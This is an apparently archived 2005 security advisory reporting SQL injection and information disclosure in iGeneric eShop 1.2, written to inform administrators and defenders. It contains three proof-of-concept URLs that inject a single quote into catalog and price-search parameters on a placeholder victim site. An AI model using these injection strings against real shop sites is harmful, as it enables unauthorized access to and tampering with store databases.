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[UNIX] Information Disclosure and SQL Injection in iGeneric eShop

Subject: [UNIX] Information Disclosure and SQL Injection in iGeneric eShop
Date: 24 Feb 2005 17:32:58 +0200
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  Information Disclosure and SQL Injection in iGeneric eShop
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SUMMARY

"Create a robust full featured online shop within minutes with  
<http://www.igeneric.co.uk/display_resources/resource1.html> iG Shop. iG 
Shop is a powerful PHP MySQL based shopping cart system that enables you 
create full featured online shop very quickly."

Multiple SQL Injection vulnerabilities were discovered in iGeneric eShop 
software, allowing a remote attacker to modify the product's existing SQL 
statements with his own arbitrary SQL statements.

DETAILS

Vulnerable Systems:
 * iGeneric eShop version 1.2

Proof of Concept:
http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&;
SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&;
SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&
l_price='&u_price=1&Submit=Search

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&;
SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&
search=1&l_price=1&u_price='&Submit=Search

Disclosure Timeline:
 * 10/02/2005 - Vulnerabilities found
 * 14/02/2005 - Vendor informed.
 * 20/02/2005 - Public notice.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:johnc@nobytes.com> John 
Cobb.
The original article can be found at:  <http://www.nobytes.com> 
http://www.nobytes.com



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